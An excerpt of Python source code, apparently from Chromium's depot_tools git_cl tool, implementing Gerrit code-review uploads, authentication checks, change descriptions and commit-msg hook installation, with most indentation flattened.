# Lazily cached values.
self._gerrit_server = None # e.g. https://chromium-review.googlesource.com
self._gerrit_host = None # e.g. chromium-review.googlesource.com
def _GetGerritHost(self):
# Lazy load of configs.
self.GetCodereviewServer()
if self._gerrit_host and '.' not in self._gerrit_host:
# Abbreviated domain like "chromium" instead of chromium.googlesource.com.
# This happens for internal stuff http://crbug.com/614312.
parsed = urlparse.urlparse(self.GetRemoteUrl())
if parsed.scheme == 'sso':
print('WARNING: using non https URLs for remote is likely broken\n'
' Your current remote is: %s' % self.GetRemoteUrl())
self._gerrit_host = '%s.googlesource.com' % self._gerrit_host
self._gerrit_server = 'https://%s' % self._gerrit_host
return self._gerrit_host
def _GetGitHost(self):
"""Returns git host to be used when uploading change to Gerrit."""
return urlparse.urlparse(self.GetRemoteUrl()).netloc
def GetCodereviewServer(self):
if not self._gerrit_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
gerrit_server_setting = self.GetCodereviewServerSetting()
if gerrit_server_setting:
self._gerrit_server = RunGit(['config', gerrit_server_setting],
error_ok=True).strip()
if self._gerrit_server:
self._gerrit_host = urlparse.urlparse(self._gerrit_server).netloc
if not self._gerrit_server:
      # We assume the repo is hosted on Gerrit, and hence the Gerrit server
      # has a "-review" suffix on its lowest-level subdomain.
parts = self._GetGitHost().split('.')
parts[0] = parts[0] + '-review'
self._gerrit_host = '.'.join(parts)
self._gerrit_server = 'https://%s' % self._gerrit_host
return self._gerrit_server
@classmethod
def IssueSettingSuffix(cls):
return 'gerritissue'
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with Gerrit server."""
if settings.GetGerritSkipEnsureAuthenticated():
# For projects with unusual authentication schemes.
# See http://crbug.com/603378.
return
# Lazy-loader to identify Gerrit and Git hosts.
if gerrit_util.GceAuthenticator.is_gce():
return
self.GetCodereviewServer()
git_host = self._GetGitHost()
assert self._gerrit_server and self._gerrit_host
cookie_auth = gerrit_util.CookiesAuthenticator()
gerrit_auth = cookie_auth.get_auth_header(self._gerrit_host)
git_auth = cookie_auth.get_auth_header(git_host)
if gerrit_auth and git_auth:
if gerrit_auth == git_auth:
return
print((
'WARNING: you have different credentials for Gerrit and git hosts.\n'
' Check your %s or %s file for credentials of hosts:\n'
' %s\n'
' %s\n'
' %s') %
(cookie_auth.get_gitcookies_path(), cookie_auth.get_netrc_path(),
git_host, self._gerrit_host,
cookie_auth.get_new_password_message(git_host)))
if not force:
ask_for_data('If you know what you are doing, press Enter to continue, '
'Ctrl+C to abort.')
return
else:
      missing = []
      if not gerrit_auth:
        missing.append(self._gerrit_host)
      if not git_auth:
        missing.append(git_host)
DieWithError('Credentials for the following hosts are required:\n'
' %s\n'
'These are read from %s (or legacy %s)\n'
'%s' % (
'\n '.join(missing),
cookie_auth.get_gitcookies_path(),
cookie_auth.get_netrc_path(),
cookie_auth.get_new_password_message(git_host)))
def PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.gerritpatchset' % self.GetBranch()
def GetCodereviewServerSetting(self):
"""Returns the git setting that stores this change's Gerrit server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.gerritserver' % branch
return None
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsetting issue."""
return [
'gerritserver',
'gerritsquashhash',
]
def GetRieveldObjForPresubmit(self):
class ThisIsNotRietveldIssue(object):
def __nonzero__(self):
# This is a hack to make presubmit_support think that rietveld is not
# defined, yet still ensure that calls directly result in a decent
# exception message below.
return False
def __getattr__(self, attr):
print(
'You aren\'t using Rietveld at the moment, but Gerrit.\n'
'Using Rietveld in your PRESUBMIT scripts won\'t work.\n'
            'Please, either change your PRESUBMIT to not use rietveld_obj.%s,\n'
'or use Rietveld for codereview.\n'
'See also http://crbug.com/579160.' % attr)
raise NotImplementedError()
return ThisIsNotRietveldIssue()
def GetGerritObjForPresubmit(self):
return presubmit_support.GerritAccessor(self._GetGerritHost())
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - no reviewers added
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'not lgtm' - Code-Review -2 from at least one approved reviewer
* 'lgtm' - Code-Review +2 from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - abandoned
"""
if not self.GetIssue():
return None
try:
data = self._GetChangeDetail(['DETAILED_LABELS', 'CURRENT_REVISION'])
except httplib.HTTPException:
return 'error'
if data['status'] in ('ABANDONED', 'MERGED'):
return 'closed'
cq_label = data['labels'].get('Commit-Queue', {})
if cq_label:
# Vote value is a stringified integer, which we expect from 0 to 2.
vote_value = cq_label.get('value', '0')
vote_text = cq_label.get('values', {}).get(vote_value, '')
if vote_text.lower() == 'commit':
return 'commit'
lgtm_label = data['labels'].get('Code-Review', {})
if lgtm_label:
if 'rejected' in lgtm_label:
return 'not lgtm'
if 'approved' in lgtm_label:
return 'lgtm'
if not data.get('reviewers', {}).get('REVIEWER', []):
return 'unsent'
messages = data.get('messages', [])
if messages:
owner = data['owner'].get('_account_id')
last_message_author = messages[-1].get('author', {}).get('_account_id')
if owner != last_message_author:
# Some reply from non-owner.
return 'reply'
return 'waiting'
def GetMostRecentPatchset(self):
data = self._GetChangeDetail(['CURRENT_REVISION'])
return data['revisions'][data['current_revision']]['_number']
def FetchDescription(self):
data = self._GetChangeDetail(['CURRENT_REVISION'])
current_rev = data['current_revision']
url = data['revisions'][current_rev]['fetch']['http']['url']
return gerrit_util.GetChangeDescriptionFromGitiles(url, current_rev)
def UpdateDescriptionRemote(self, description):
gerrit_util.SetCommitMessage(self._GetGerritHost(), self.GetIssue(),
description)
def CloseIssue(self):
gerrit_util.AbandonChange(self._GetGerritHost(), self.GetIssue(), msg='')
def GetApprovingReviewers(self):
"""Returns a list of reviewers approving the change.
Note: not necessarily committers.
"""
raise NotImplementedError()
def SubmitIssue(self, wait_for_merge=True):
gerrit_util.SubmitChange(self._GetGerritHost(), self.GetIssue(),
wait_for_merge=wait_for_merge)
def _GetChangeDetail(self, options=None, issue=None):
options = options or []
issue = issue or self.GetIssue()
assert issue, 'issue required to query Gerrit'
return gerrit_util.GetChangeDetail(self._GetGerritHost(), str(issue),
options)
def CMDLand(self, force, bypass_hooks, verbose):
if git_common.is_dirty_git_tree('land'):
return 1
detail = self._GetChangeDetail(['CURRENT_REVISION', 'LABELS'])
if u'Commit-Queue' in detail.get('labels', {}):
if not force:
ask_for_data('\nIt seems this repository has a Commit Queue, '
'which can test and land changes for you. '
'Are you sure you wish to bypass it?\n'
'Press Enter to continue, Ctrl+C to abort.')
differs = True
last_upload = RunGit(['config',
'branch.%s.gerritsquashhash' % self.GetBranch()],
error_ok=True).strip()
# Note: git diff outputs nothing if there is no diff.
if not last_upload or RunGit(['diff', last_upload]).strip():
print('WARNING: some changes from local branch haven\'t been uploaded')
else:
if detail['current_revision'] == last_upload:
differs = False
else:
print('WARNING: local branch contents differ from latest uploaded '
'patchset')
if differs:
if not force:
ask_for_data(
'Do you want to submit latest Gerrit patchset and bypass hooks?')
print('WARNING: bypassing hooks and submitting latest uploaded patchset')
elif not bypass_hooks:
hook_results = self.RunHook(
committing=True,
may_prompt=not force,
verbose=verbose,
change=self.GetChange(self.GetCommonAncestorWithUpstream(), None))
if not hook_results.should_continue():
return 1
self.SubmitIssue(wait_for_merge=True)
print('Issue %s has been submitted.' % self.GetIssueURL())
return 0
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
assert not reject
assert not nocommit
assert not directory
assert parsed_issue_arg.valid
self._changelist.issue = parsed_issue_arg.issue
if parsed_issue_arg.hostname:
self._gerrit_host = parsed_issue_arg.hostname
self._gerrit_server = 'https://%s' % self._gerrit_host
detail = self._GetChangeDetail(['ALL_REVISIONS'])
if not parsed_issue_arg.patchset:
# Use current revision by default.
revision_info = detail['revisions'][detail['current_revision']]
patchset = int(revision_info['_number'])
else:
patchset = parsed_issue_arg.patchset
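      # Find the revision matching the requested patchset; the for/else only
      # dies if the loop finishes without a matching revision.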
for revision_info in detail['revisions'].itervalues():
if int(revision_info['_number']) == parsed_issue_arg.patchset:
break
else:
DieWithError('Couldn\'t find patchset %i in issue %i' %
(parsed_issue_arg.patchset, self.GetIssue()))
fetch_info = revision_info['fetch']['http']
RunGit(['fetch', fetch_info['url'], fetch_info['ref']])
RunGit(['cherry-pick', 'FETCH_HEAD'])
self.SetIssue(self.GetIssue())
self.SetPatchset(patchset)
    print('Committed patch for issue %i patchset %i locally' %
(self.GetIssue(), self.GetPatchset()))
return 0
@staticmethod
def ParseIssueURL(parsed_url):
if not parsed_url.scheme or not parsed_url.scheme.startswith('http'):
return None
# Gerrit's new UI is https://domain/c/<issue_number>[/[patchset]]
# But current GWT UI is https://domain/#/c/<issue_number>[/[patchset]]
    # Short urls like https://domain/<issue_number> can also be used. They
    # don't support specifying a patchset on the site (you'd get a 404), but
    # we still accept an optional patchset here.
if parsed_url.path == '/':
part = parsed_url.fragment
else:
part = parsed_url.path
    match = re.match(r'(/c)?/(\d+)(/(\d+)?/?)?$', part)
if match:
return _ParsedIssueNumberArgument(
issue=int(match.group(2)),
patchset=int(match.group(4)) if match.group(4) else None,
hostname=parsed_url.netloc)
return None
def _GerritCommitMsgHookCheck(self, offer_removal):
hook = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.path.exists(hook):
return
    # Crude attempt to distinguish the Gerrit Codereview hook from a
    # potentially custom, developer-made one.
data = gclient_utils.FileRead(hook)
if not('From Gerrit Code Review' in data and 'add_ChangeId()' in data):
return
print('Warning: you have Gerrit commit-msg hook installed.\n'
          'It is not necessary for uploading with git cl in squash mode, '
'and may interfere with it in subtle ways.\n'
'We recommend you remove the commit-msg hook.')
if offer_removal:
reply = ask_for_data('Do you want to remove it now? [Yes/No]')
if reply.lower().startswith('y'):
gclient_utils.rm_file_or_tree(hook)
print('Gerrit commit-msg hook removed.')
else:
print('OK, will keep Gerrit commit-msg hook in place.')
def CMDUploadChange(self, options, args, change):
"""Upload the current branch to Gerrit."""
if options.squash and options.no_squash:
DieWithError('Can only use one of --squash or --no-squash')
if not options.squash and not options.no_squash:
# Load default for user, repo, squash=true, in this order.
options.squash = settings.GetSquashGerritUploads()
elif options.no_squash:
options.squash = False
# We assume the remote called "origin" is the one we want.
# It is probably not worthwhile to support different workflows.
gerrit_remote = 'origin'
remote, remote_branch = self.GetRemoteBranch()
branch = GetTargetRef(remote, remote_branch, options.target_branch,
pending_prefix='')
if options.squash:
self._GerritCommitMsgHookCheck(offer_removal=not options.force)
if not self.GetIssue():
        # TODO(tandrii): deprecate this after 2016Q2. Backwards compatibility
        # with the shadow branch, which used to contain the change-id for a
        # given branch. From it we can fetch the actual issue number and
        # store it as a property of the branch, which is the new way.
message = RunGitSilent([
'show', '--format=%B', '-s',
'refs/heads/git_cl_uploads/%s' % self.GetBranch()])
if message:
change_ids = git_footers.get_footer_change_id(message.strip())
if change_ids and len(change_ids) == 1:
details = self._GetChangeDetail(issue=change_ids[0])
if details:
print('WARNING: found old upload in branch git_cl_uploads/%s '
'corresponding to issue %s' %
(self.GetBranch(), details['_number']))
self.SetIssue(details['_number'])
if not self.GetIssue():
DieWithError(
'\n' # For readability of the blob below.
'Found old upload in branch git_cl_uploads/%s, '
'but failed to find corresponding Gerrit issue.\n'
'If you know the issue number, set it manually first:\n'
' git cl issue 123456\n'
'If you intended to upload this CL as new issue, '
'just delete or rename the old upload branch:\n'
' git rename-branch git_cl_uploads/%s old_upload-%s\n'
'After that, please run git cl upload again.' %
tuple([self.GetBranch()] * 3))
        # End of backwards compatibility.
if self.GetIssue():
# Try to get the message from a previous upload.
message = self.GetDescription()
if not message:
DieWithError(
'failed to fetch description from current Gerrit issue %d\n'
'%s' % (self.GetIssue(), self.GetIssueURL()))
change_id = self._GetChangeDetail()['change_id']
while True:
footer_change_ids = git_footers.get_footer_change_id(message)
if footer_change_ids == [change_id]:
break
if not footer_change_ids:
message = git_footers.add_footer_change_id(message, change_id)
print('WARNING: appended missing Change-Id to issue description')
continue
# There is already a valid footer but with different or several ids.
# Doing this automatically is non-trivial as we don't want to lose
# existing other footers, yet we want to append just 1 desired
# Change-Id. Thus, just create a new footer, but let user verify the
# new description.
message = '%s\n\nChange-Id: %s' % (message, change_id)
print(
'WARNING: issue %s has Change-Id footer(s):\n'
' %s\n'
'but issue has Change-Id %s, according to Gerrit.\n'
'Please, check the proposed correction to the description, '
'and edit it if necessary but keep the "Change-Id: %s" footer\n'
% (self.GetIssue(), '\n '.join(footer_change_ids), change_id,
change_id))
ask_for_data('Press enter to edit now, Ctrl+C to abort')
if not options.force:
change_desc = ChangeDescription(message)
change_desc.prompt()
message = change_desc.description
if not message:
DieWithError("Description is empty. Aborting...")
# Continue the while loop.
# Sanity check of this code - we should end up with proper message
# footer.
assert [change_id] == git_footers.get_footer_change_id(message)
change_desc = ChangeDescription(message)
else:
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not options.force:
change_desc.prompt()
if not change_desc.description:
DieWithError("Description is empty. Aborting...")
message = change_desc.description
change_ids = git_footers.get_footer_change_id(message)
if len(change_ids) > 1:
DieWithError('too many Change-Id footers, at most 1 allowed.')
if not change_ids:
# Generate the Change-Id automatically.
message = git_footers.add_footer_change_id(
message, GenerateGerritChangeId(message))
change_desc.set_description(message)
change_ids = git_footers.get_footer_change_id(message)
assert len(change_ids) == 1
change_id = change_ids[0]
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
      if remote == '.':
# If our upstream branch is local, we base our squashed commit on its
# squashed version.
upstream_branch_name = scm.GIT.ShortBranchName(upstream_branch)
# Check the squashed hash of the parent.
parent = RunGit(['config',
'branch.%s.gerritsquashhash' % upstream_branch_name],
error_ok=True).strip()
# Verify that the upstream branch has been uploaded too, otherwise
# Gerrit will create additional CLs when uploading.
if not parent or (RunGitSilent(['rev-parse', upstream_branch + ':']) !=
RunGitSilent(['rev-parse', parent + ':'])):
# TODO(tandrii): remove "old depot_tools" part on April 12, 2016.
DieWithError(
'Upload upstream branch %s first.\n'
'Note: maybe you\'ve uploaded it with --no-squash or with an old '
'version of depot_tools. If so, then re-upload it with:\n'
' git cl upload --squash\n' % upstream_branch_name)
else:
parent = self.GetCommonAncestorWithUpstream()
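      # Squash locally: build a single commit whose tree is the current HEAD
      # tree and whose sole parent is the chosen base, without modifying the
      # working branch.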
tree = RunGit(['rev-parse', 'HEAD:']).strip()
ref_to_push = RunGit(['commit-tree', tree, '-p', parent,
'-m', message]).strip()
else:
change_desc = ChangeDescription(
options.message or CreateDescriptionFromLog(args))
if not change_desc.description:
DieWithError("Description is empty. Aborting...")
if not git_footers.get_footer_change_id(change_desc.description):
DownloadGerritHook(False)
change_desc.set_description(self._AddChangeIdToCommitMessage(options,
args))
ref_to_push = 'HEAD'
parent = '%s/%s' % (gerrit_remote, branch)
change_id = git_footers.get_footer_change_id(change_desc.description)[0]
assert change_desc
commits = RunGitSilent(['rev-list', '%s..%s' % (parent,
ref_to_push)]).splitlines()
if len(commits) > 1:
print('WARNING: This will upload %d commits. Run the following command '
'to see which commits will be uploaded: ' % len(commits))
print('git log %s..%s' % (parent, ref_to_push))
print('You can also use `git squash-branch` to squash these into a '
'single commit.')
ask_for_data('About to upload; enter to confirm.')
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers, options.tbr_owners,
change)
# Extra options that can be specified at push time. Doc:
# https://gerrit-review.googlesource.com/Documentation/user-upload.html
refspec_opts = []
if options.title:
# Per doc, spaces must be converted to underscores, and Gerrit will do the
# reverse on its side.
if '_' in options.title:
print('WARNING: underscores in title will be converted to spaces.')
refspec_opts.append('m=' + options.title.replace(' ', '_'))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError('Must specify reviewers to send email.')
refspec_opts.append('notify=ALL')
else:
refspec_opts.append('notify=NONE')
cc = self.GetCCList().split(',')
if options.cc:
cc.extend(options.cc)
cc = filter(None, cc)
if cc:
refspec_opts.extend('cc=' + email.strip() for email in cc)
if change_desc.get_reviewers():
refspec_opts.extend('r=' + email.strip()
for email in change_desc.get_reviewers())
refspec_suffix = ''
if refspec_opts:
refspec_suffix = '%' + ','.join(refspec_opts)
assert ' ' not in refspec_suffix, (
'spaces not allowed in refspec: "%s"' % refspec_suffix)
refspec = '%s:refs/for/%s%s' % (ref_to_push, branch, refspec_suffix)
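# Illustrative refspec (hypothetical reviewer/cc addresses): with a title set,
# no --send-mail, one cc and one reviewer, the push target built above looks
# roughly like
#   HEAD:refs/for/master%m=Fix_typo,notify=NONE,cc=dev@example.com,r=rev@example.com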
push_stdout = gclient_utils.CheckCallAndFilter(
['git', 'push', gerrit_remote, refspec],
print_stdout=True,
# Flush after every line: useful for seeing progress when running as
# recipe.
filter_fn=lambda _: sys.stdout.flush())
if options.squash:
regex = re.compile(r'remote:\s+https?://[\w\-\.\/]*/(\d+)\s.*')
change_numbers = [m.group(1)
for m in map(regex.match, push_stdout.splitlines())
if m]
if len(change_numbers) != 1:
DieWithError(
('Created|Updated %d issues on Gerrit, but only 1 expected.\n'
'Change-Id: %s') % (len(change_numbers), change_id))
self.SetIssue(change_numbers[0])
RunGit(['config', 'branch.%s.gerritsquashhash' % self.GetBranch(),
ref_to_push])
return 0
def _AddChangeIdToCommitMessage(self, options, args):
"""Re-commits using the current message, assumes the commit hook is in
place.
"""
log_desc = options.message or CreateDescriptionFromLog(args)
git_command = ['commit', '--amend', '-m', log_desc]
RunGit(git_command)
new_log_desc = CreateDescriptionFromLog(args)
if git_footers.get_footer_change_id(new_log_desc):
print('git-cl: Added Change-Id to commit message.')
return new_log_desc
else:
DieWithError('ERROR: Gerrit commit-msg hook not installed.')
def SetCQState(self, new_state):
"""Sets the Commit-Queue label assuming canonical CQ config for Gerrit."""
# TODO(tandrii): maybe allow configurability in codereview.settings or by
# self-discovery of label config for this CL using REST API.
vote_map = {
_CQState.NONE: 0,
_CQState.DRY_RUN: 1,
_CQState.COMMIT : 2,
}
gerrit_util.SetReview(self._GetGerritHost(), self.GetIssue(),
labels={'Commit-Queue': vote_map[new_state]})
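# Illustrative semantics of vote_map above, assuming the canonical Chromium CQ
# label configuration on Gerrit: NONE clears the Commit-Queue label (vote 0),
# DRY_RUN votes +1 to request a dry run, and COMMIT votes +2 to request a full
# commit attempt.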
_CODEREVIEW_IMPLEMENTATIONS = {
'rietveld': _RietveldChangelistImpl,
'gerrit': _GerritChangelistImpl,
}
def _add_codereview_select_options(parser):
"""Appends --gerrit and --rietveld options to force specific codereview."""
parser.codereview_group = optparse.OptionGroup(
parser, 'EXPERIMENTAL! Codereview override options')
parser.add_option_group(parser.codereview_group)
parser.codereview_group.add_option(
'--gerrit', action='store_true',
help='Force the use of Gerrit for codereview')
parser.codereview_group.add_option(
'--rietveld', action='store_true',
help='Force the use of Rietveld for codereview')
def _process_codereview_select_options(parser, options):
if options.gerrit and options.rietveld:
parser.error('Options --gerrit and --rietveld are mutually exclusive')
options.forced_codereview = None
if options.gerrit:
options.forced_codereview = 'gerrit'
elif options.rietveld:
options.forced_codereview = 'rietveld'
class ChangeDescription(object):
"""Contains a parsed form of the change description."""
R_LINE = r'^[ \t]*(TBR|R)[ \t]*=[ \t]*(.*?)[ \t]*$'
BUG_LINE = r'^[ \t]*(BUG)[ \t]*=[ \t]*(.*?)[ \t]*$'
def __init__(self, description):
self._description_lines = (description or '').strip().splitlines()
@property # www.logilab.org/ticket/89786
def description(self): # pylint: disable=E0202
return '\n'.join(self._description_lines)
def set_description(self, desc):
if isinstance(desc, basestring):
lines = desc.splitlines()
else:
lines = [line.rstrip() for line in desc]
while lines and not lines[0]:
lines.pop(0)
while lines and not lines[-1]:
lines.pop(-1)
self._description_lines = lines
def update_reviewers(self, reviewers, add_owners_tbr=False, change=None):
"""Rewrites the R=/TBR= line(s) as a single line each."""
assert isinstance(reviewers, list), reviewers
if not reviewers and not add_owners_tbr:
return
reviewers = reviewers[:]
# Get the set of R= and TBR= lines and remove them from the description.
regexp = re.compile(self.R_LINE)
matches = [regexp.match(line) for line in self._description_lines]
new_desc = [l for i, l in enumerate(self._description_lines)
if not matches[i]]
self.set_description(new_desc)
# Construct new unified R= and TBR= lines.
r_names = []
tbr_names = []
for match in matches:
if not match:
continue
people = cleanup_list([match.group(2).strip()])
if match.group(1) == 'TBR':
tbr_names.extend(people)
else:
r_names.extend(people)
for name in r_names:
if name not in reviewers:
reviewers.append(name)
if add_owners_tbr:
owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=os.path, glob=glob.glob)
all_reviewers = set(tbr_names + reviewers)
missing_files = owners_db.files_not_covered_by(change.LocalPaths(),
all_reviewers)
tbr_names.extend(owners_db.reviewers_for(missing_files,
change.author_email))
new_r_line = 'R=' + ', '.join(reviewers) if reviewers else None
new_tbr_line = 'TBR=' + ', '.join(tbr_names) if tbr_names else None
# Put the new lines in the description where the old first R= line was.
line_loc = next((i for i, match in enumerate(matches) if match), -1)
if 0 <= line_loc < len(self._description_lines):
if new_tbr_line:
self._description_lines.insert(line_loc, new_tbr_line)
if new_r_line:
self._description_lines.insert(line_loc, new_r_line)
else:
if new_r_line:
self.append_footer(new_r_line)
if new_tbr_line:
self.append_footer(new_tbr_line)
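# Illustrative example (hypothetical addresses): for a description containing
#   R=alice@chromium.org
#   TBR=bob@chromium.org
# and reviewers=['carol@chromium.org'], the old lines are removed and replaced,
# at the position of the first R= line, by
#   R=carol@chromium.org, alice@chromium.org
#   TBR=bob@chromium.org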
def prompt(self):
"""Asks the user to update the description."""
self.set_description([
'# Enter a description of the change.',
'# This will be displayed on the codereview site.',
'# The first line will also be used as the subject of the review.',
'#--------------------This line is 72 characters long'
'--------------------',
] + self._description_lines)
regexp = re.compile(self.BUG_LINE)
if not any((regexp.match(line) for line in self._description_lines)):
self.append_footer('BUG=%s' % settings.GetBugPrefix())
content = gclient_utils.RunEditor(self.description, True,
git_editor=settings.GetGitEditor())
if not content:
DieWithError('Running editor failed')
lines = content.splitlines()
# Strip off comments.
clean_lines = [line.rstrip() for line in lines if not line.startswith('#')]
if not clean_lines:
DieWithError('No CL description, aborting')
self.set_description(clean_lines)
def append_footer(self, line):
"""Adds a footer line to the description.
Differentiates legacy "KEY=xxx" footers (used to be called tags) and
Gerrit's footers in the form of "Footer-Key: footer any value" and ensures
that Gerrit footers are always at the end.
"""
parsed_footer_line = git_footers.parse_footer(line)
if parsed_footer_line:
# Line is a gerrit footer in the form: Footer-Key: any value.
# Thus, must be appended observing Gerrit footer rules.
self.set_description(
git_footers.add_footer(self.description,
key=parsed_footer_line[0],
value=parsed_footer_line[1]))
return
if not self._description_lines:
self._description_lines.append(line)
return
top_lines, gerrit_footers, _ = git_footers.split_footers(self.description)
if gerrit_footers:
# git_footers.split_footers ensures that there is an empty line before
# actual (gerrit) footers, if any. We have to keep it that way.
assert top_lines and top_lines[-1] == ''
top_lines, separator = top_lines[:-1], top_lines[-1:]
else:
separator = [] # No need for separator if there are no gerrit_footers.
prev_line = top_lines[-1] if top_lines else ''
if (not presubmit_support.Change.TAG_LINE_RE.match(prev_line) or
not presubmit_support.Change.TAG_LINE_RE.match(line)):
top_lines.append('')
top_lines.append(line)
self._description_lines = top_lines + separator + gerrit_footers
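# Illustrative behaviour (hypothetical values): appending 'BUG=123' to a
# description that already ends with a Gerrit footer block such as
#   Change-Id: I0123abcd
# inserts the legacy KEY=value tag above that block, keeping the Gerrit footers
# last, whereas appending 'Reviewed-By: someone' is parsed as a Gerrit footer
# and added to the footer block itself.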
def get_reviewers(self):
"""Retrieves the list of reviewers."""
matches = [re.match(self.R_LINE, line) for line in self._description_lines]
reviewers = [match.group(2).strip() for match in matches if match]
return cleanup_list(reviewers)
def get_approving_reviewers(props):
"""Retrieves the reviewers that approved a CL from the issue properties with
messages.
Note that the list may contain reviewers that are not committer, thus are not
considered by the CQ.
"""
return sorted(
set(
message['sender']
for message in props['messages']
if message['approval'] and message['sender'] in props['reviewers']
)
)
def FindCodereviewSettingsFile(filename='codereview.settings'):
"""Finds the given file starting in the cwd and going up.
Only looks up to the top of the repository unless an
'inherit-review-settings-ok' file exists in the root of the repository.
"""
inherit_ok_file = 'inherit-review-settings-ok'
cwd = os.getcwd()
root = settings.GetRoot()
if os.path.isfile(os.path.join(root, inherit_ok_file)):
root = '/'
while True:
if filename in os.listdir(cwd):
if os.path.isfile(os.path.join(cwd, filename)):
return open(os.path.join(cwd, filename))
if cwd == root:
break
cwd = os.path.dirname(cwd)
def LoadCodereviewSettingsFromFile(fileobj):
"""Parse a codereview.settings file and updates hooks."""
keyvals = gclient_utils.ParseCodereviewSettingsContent(fileobj.read())
def SetProperty(name, setting, unset_error_ok=False):
fullname = 'rietveld.' + name
if setting in keyvals:
RunGit(['config', fullname, keyvals[setting]])
else:
RunGit(['config', '--unset-all', fullname], error_ok=unset_error_ok)
SetProperty('server', 'CODE_REVIEW_SERVER')
# Only server setting is required. Other settings can be absent.
# In that case, we ignore errors raised during option deletion attempt.
SetProperty('cc', 'CC_LIST', unset_error_ok=True)
SetProperty('private', 'PRIVATE', unset_error_ok=True)
SetProperty('tree-status-url', 'STATUS', unset_error_ok=True)
SetProperty('viewvc-url', 'VIEW_VC', unset_error_ok=True)
SetProperty('bug-prefix', 'BUG_PREFIX', unset_error_ok=True)
SetProperty('cpplint-regex', 'LINT_REGEX', unset_error_ok=True)
SetProperty('force-https-commit-url', 'FORCE_HTTPS_COMMIT_URL',
unset_error_ok=True)
SetProperty('cpplint-ignore-regex', 'LINT_IGNORE_REGEX', unset_error_ok=True)
SetProperty('project', 'PROJECT', unset_error_ok=True)
SetProperty('pending-ref-prefix', 'PENDING_REF_PREFIX', unset_error_ok=True)
SetProperty('run-post-upload-hook', 'RUN_POST_UPLOAD_HOOK',
unset_error_ok=True)
if 'GERRIT_HOST' in keyvals:
RunGit(['config', 'gerrit.host', keyvals['GERRIT_HOST']])
if 'GERRIT_SQUASH_UPLOADS' in keyvals:
RunGit(['config', 'gerrit.squash-uploads',
keyvals['GERRIT_SQUASH_UPLOADS']])
if 'GERRIT_SKIP_ENSURE_AUTHENTICATED' in keyvals:
RunGit(['config', 'gerrit.skip-ensure-authenticated',
keyvals['GERRIT_SKIP_ENSURE_AUTHENTICATED']])
if 'PUSH_URL_CONFIG' in keyvals and 'ORIGIN_URL_CONFIG' in keyvals:
# should be of the form
# PUSH_URL_CONFIG: url.ssh://gitrw.chromium.org.pushinsteadof
# ORIGIN_URL_CONFIG: http://src.chromium.org/git
RunGit(['config', keyvals['PUSH_URL_CONFIG'],
keyvals['ORIGIN_URL_CONFIG']])
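# Illustrative codereview.settings content handled above (server and addresses
# are hypothetical; only CODE_REVIEW_SERVER is required):
#   CODE_REVIEW_SERVER: codereview.example.com
#   CC_LIST: project-reviews@example.com
#   VIEW_VC: https://example.googlesource.com/project/+/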
def urlretrieve(source, destination):
"""urllib is broken for SSL connections via a proxy therefore we
can't use urllib.urlretrieve()."""
with open(destination, 'w') as f:
f.write(urllib2.urlopen(source).read())
def hasSheBang(fname):
"""Checks fname is a #! script."""
with open(fname) as f:
return f.read(2).startswith('#!')
# TODO(bpastene) Remove once a cleaner fix to crbug.com/600473 presents itself.
def DownloadHooks(*args, **kwargs):
pass
def DownloadGerritHook(force):
"""Download and install Gerrit commit-msg hook.
Args:
force: True to update hooks. False to install hooks if not present.
"""
if not settings.GetIsGerrit():
return
src = 'https://gerrit-review.googlesource.com/tools/hooks/commit-msg'
dst = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.access(dst, os.X_OK):
if os.path.exists(dst):
if not force:
return
try:
urlretrieve(src, dst)
if not hasSheBang(dst):
DieWithError('Not a script: %s\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % (dst, src))
os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
except Exception:
if os.path.exists(dst):
os.remove(dst)
DieWithError('\nFailed to download hooks.\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % src)
def GetRietveldCodereviewSettingsInteractively():
"""Prompt the user for settings."""
server = settings.GetDefaultServerUrl(error_ok=True)
prompt = 'Rietveld server (host[:port])'
prompt += ' [%s]' % (server or DEFAULT_SERVER)
newserver = ask_for_data(prompt + ':')
if not server and not newserver:
newserver = DEFAULT_SERVER
if newserver:
newserver = gclient_utils.UpgradeToHttps(newserver)
if newserver != server:
RunGit(['config', 'rietveld.server', newserver])
def SetProperty(initial, caption, name, is_url):
prompt = caption
if initial:
prompt += ' ("x" to clear) [%s]' % initial
new_val = ask_for_data(prompt + ':')
if new_val == 'x':
RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)
elif new_val:
if is_url:
new_val = gclient_utils.UpgradeToHttps(new_val)
if new_val != initial:
RunGit(['config', 'rietveld.' + name, new_val])
SetProperty(settings.GetDefaultCCList(), 'CC list', 'cc', False)
SetProperty(settings.GetDefaultPrivateFlag(),
'Private flag (rietveld only)', 'private', False)
SetProperty(settings.GetTreeStatusUrl(error_ok=True), 'Tree status URL',
'tree-status-url', False)
SetProperty(settings.GetViewVCUrl(), 'ViewVC URL', 'viewvc-url', True)
SetProperty(settings.GetBugPrefix(), 'Bug Prefix', 'bug-prefix', False)
SetProperty(settings.GetRunPostUploadHook(), 'Run Post Upload Hook',
'run-post-upload-hook', False)
@subcommand.usage('[repo root containing codereview.settings]')
def CMDconfig(parser, args):
"""Edits configuration for this tree."""
print('WARNING: git cl config works for Rietveld only.\n'
